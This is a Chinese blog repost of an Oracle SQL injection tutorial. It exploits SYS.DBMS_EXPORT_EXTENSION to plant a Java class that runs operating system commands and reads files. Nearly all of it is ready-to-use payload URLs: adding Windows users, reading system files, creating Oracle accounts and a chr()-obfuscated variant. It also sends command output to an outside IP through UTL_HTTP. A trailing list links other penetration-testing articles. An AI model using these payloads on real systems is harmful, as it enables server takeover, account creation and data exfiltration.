犀利的 oracle 注入技術

原創 逝之君 2020-07-05 01:36

原來一直不知道oracle注入可以你拿shell,特意記錄下

以下的演示都是在web上的sql plus執行的,在web注入時 把select SYS.DBMS_EXPORT_EXTENSION.....改成 
  /xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....) 
  的形式即可。(用" 'a'|| "是爲了讓語句返回true值) 
  語句有點長,可能要用post提交。 
  以下是各個步驟: 
  1.創建包 
  通過注入 SYS.DBMS_EXPORT_EXTENSION 函數,在oracle上創建Java包LinxUtil,裏面兩個函數,runCMD用於執行系統命令,readFile用於讀取文件:
  /xxx.jsp?id=1 and '1'<>'a'||( 
  select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
  create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
  new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
  }'''';END;'';END;--','SYS',0,'1',0) from dual 
  ) 
  ------------------------ 
  如果url有長度限制,可以把readFile()函數塊去掉,即: 
  /xxx.jsp?id=1 and '1'<>'a'||( 
  select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
  create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
  new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
  }'''';END;'';END;--','SYS',0,'1',0) from dual 
  ) 
  同時把後面步驟 提到的 對readFile()的處理語句去掉。 
  ------------------------------ 
  2.賦Java權限 
  select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual
  3.創建函數 
  select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
  create or replace function LinxRunCMD(p_cmd in varchar2)  return varchar2  as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual
  select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
  create or replace function LinxReadFile(filename in varchar2)  return varchar2  as language java name ''''''''LinxUtil.readFile(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual
  4.賦public執行函數的權限 
  select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual
  select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual
  5.測試上面的幾步是否成功 
  and '1'<>'11'||( 
  select  OBJECT_ID from all_objects where  object_name ='LINXRUNCMD' 
  ) 
  and '1'<>( 
  select  OBJECT_ID from all_objects where  object_name ='LINXREADFILE' 
  ) 
  6.執行命令: 
  /xxx.jsp?id=1 and '1'<>( 
  select  sys.LinxRunCMD('cmd /c net user linx /add') from dual 
  ) 
  /xxx.jsp?id=1 and '1'<>( 
  select  sys.LinxReadFile('c:/boot.ini') from dual

)
  
  注意sys.LinxReadFile()返回的是varchar類型,不能用"and 1<>" 代替 "and '1'<>"。 
  如果要查看運行結果可以用 union : 
  /xxx.jsp?id=1 union select  sys.LinxRunCMD('cmd /c net user linx /add') from dual
  或者UTL_HTTP.request(: 
  /xxx.jsp?id=1 and '1'<>( 
  SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'),' ','%20'),'\n','%0A')) FROM dual
  ) 
  /xxx.jsp?id=1 and '1'<>( 
  SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxReadFile('c:/boot.ini'),' ','%20'),'\n','%0A')) FROM dual
  ) 
  注意:用UTL_HTTP.request時,要用 REPLACE() 把空格、換行符給替換掉,否則會無法提交http request。用utl_encode.base64_encode也可以。
  -------------------- 
  6.內部變化 
  通過以下命令可以查看all_objects表達改變: 
  select  * from all_objects where  object_name like '%LINX%' or  object_name like '%Linx%'
  7.刪除我們創建的函數 
  select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
  drop function LinxRunCMD  '''';END;'';END;--','SYS',0,'1',0) from dual 
  ==================================================== 
  全文結束。謹以此文贈與我的朋友。 
  linx 
  124829445 
  2008.1.12 
  [email protected] 
  ====================================================================== 
  測試漏洞的另一方法: 
  創建oracle帳號: 
  select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
  CREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
  即: 
  select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),
  chr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual 
  確定漏洞存在: 
  1<>( 
  select user_id from all_users where username='LINXSQL' 
  ) 
  給linxsql連接權限: 
  select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
  GRANT CONNECT TO linxsql'''';END;'';END;--','SYS',0,'1',0) from dual 
  刪除帳號: 
  select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
  drop user LINXSQL'''';END;'';END;--','SYS',0,'1',0) from dual 
  ====================== 
  以下方法創建一個可以執行多語句的函數Linx_query(),執行成功的話返回數值"1",但權限是繼承的,可能僅僅是public權限,作用似乎不大,真的要用到話可以考慮grant dba to 當前的User:
  1.jsp?id=1 and '1'<>( 
  select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
  create or replace function Linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1;  end;   '''';END;'';END;--','SYS',0,'1',0) from dual
 
) and ... 1.jsp?id=1 and '1'( select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT.PUT(:P1);EXECUTE IMMEDIATE

 )


發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章

短信驗證碼字典腳本

f = open('/Users/superzedlv/Desktop/yanzhengma.txt','w') start = 0000 end = 10000 print len(str(end)) b = '' #line

SuperZedLv 2020-07-08 05:30:22

滲透入門知識-CSRF漏洞原理到實戰

什麼是CSRF漏洞? 跨站請求僞造,就是黑客以被攻擊者的名義發送請求,完全合規合法。 CSRF原理 A站點存在CSRF漏洞、B站點爲黑客僞造包含A站點正常請求鏈接的站點。 1)當被攻擊者打開A站點,進行身份驗證,登陸成功。A站點服

SuperZedLv 2020-07-08 05:30:22

滲透測試入門知識-文件上傳漏洞原理到實戰

文件包含漏洞原理 程序開發人員一般會把重複使用的函數寫到單個文件中,需要使用某個函數時直接調用此文件,而無需再次編寫,這種文件調用的過程一般被稱爲文件包含。通過函數包含文件時,由於沒有對包含的文件名進行有效的過濾處理,被攻擊者利用

SuperZedLv 2020-07-08 05:30:22

安全漏洞從原理到實戰--命令執行漏洞

01 命令執行漏洞 即黑客可以通過控制參數執行系統命令,形成原因是開發人員對用戶輸入參數安全檢查不足從而導致的惡意命令執行。 02 常見的系統命令執行函數 Php命令執行函數eval()函數、assert()、preg_repla

SuperZedLv 2020-07-08 05:30:21

越權漏洞修復參考

0x00 背景   https://www.xx.com/service/order.do?orderid=2280582085200280582 上圖,選擇orderid作爲參數, 越權遍歷爬取其他人的信息,類似選擇某個參數或者某個接口

煜铭2011 2020-07-08 02:03:38

短信轟炸漏洞修復

0x00 漏洞背景 短信轟炸攻擊時常見的一種攻擊,攻擊者通過網站頁面中所提供的發送短信驗證碼的功能處,通過對其發送數據包的獲取後,進行重放,如果服務器短信平臺未做校驗的情況時,系統會一直去發送短信,這樣就造成了短信轟炸的漏洞。 攻擊者通過

煜铭2011 2020-07-08 02:03:38

內網滲透(上)

每日一句: 做安全,有一定實力的話。找工作,待遇不好就不要去,不要委屈求全。 世界上好地方那麼多,不出去看看的話,你就以爲這就是世界 另外,二進制其實也不是多值錢的玩意,沒必要覺得多深奧 聲明: 內網滲透

划水的小白白 2020-07-08 00:37:05

XCTF的easytornado題目

py是個好工具,要多加以利用 ![在這裏插入圖片描述](https://img-blog.csdnimg.cn/20200707170254527.png?x-oss-process=image/watermark,type_Z

001000001000 2020-07-08 00:12:42

Netcat安裝使用詳解

Netcat 從網絡的一段讀取數據,輸出到網絡的另一端(可以使用於TCP和UDP協議)   安裝 Windows可自行在github上下載netcat kali linux上 方法一: sudo yum install n

想冲大厂的癞蛤蟆 2020-07-07 11:59:33

phpmyadmin後臺getshell方法學習總結

0x00 前言 最近看的一篇文章中提到過phpmyadmin一些後臺getshell方式,就想着寫篇博客學習總結一下~~ 0x01 getshell方法 一、select into outfile直接寫入 1.利用條件 對web

0nc3 2020-07-07 09:51:37

Day8——提權學習之第三方軟件G6-FTP提權

0x00 G6-FTP簡介 G6 FTP Server 新一代的 FTP 服務器端軟件,支持 RFC-959 標準並增強其中的某些功能,上傳和下載都可以續傳,實時查看運行狀態,佔用帶寬,還有很多功能。 G6-FTP的默認端

0nc3 2020-07-07 09:51:37

Day9——提權學習之第三方軟件FileZilla提權

0x00 FileZilla簡介 FileZilla是一個免費開源的FTP軟件,分爲客戶端版本和服務器版本,具備所有的FTP軟件功能。 FileZilla的默認端口爲14147,只偵聽在127.0.0.1的14147端口

0nc3 2020-07-07 09:51:27

Day5——提權學習之MSSQL數據庫提權學習總結

0x00 SQLServer提權基礎 1、SQLServer權限 列出sql server 角色用戶的權限 按照從最低級別角色(bulkadmin)到最高級別角色(sysadmin)的順序進行描述: 1.bulkadmin:這個

0nc3 2020-07-07 09:51:27

sql注入技巧

堆疊注入 改變大小寫 寬字節 雙寫注入 截斷注入 se%lect 繞過安全狗 se/**/lect繞過 `param`繞過 rename和alter改變表的數據結構 預編譯{ Set @sql = CONCAT(‘se’,‘lec

001000001000 2020-07-07 07:50:31

XCTF題目 supersqli 的做題思路

在輸入框提交後瀏覽器自動進行URL編碼。若在hackbar中,則需要手動進行URL編碼。 嘗試: 1’ – 顯示結果 於是修改爲 1’# 顯示: 正常情況下輸入 一: 1 二: 1' and 1=1

001000001000 2020-07-07 07:50:31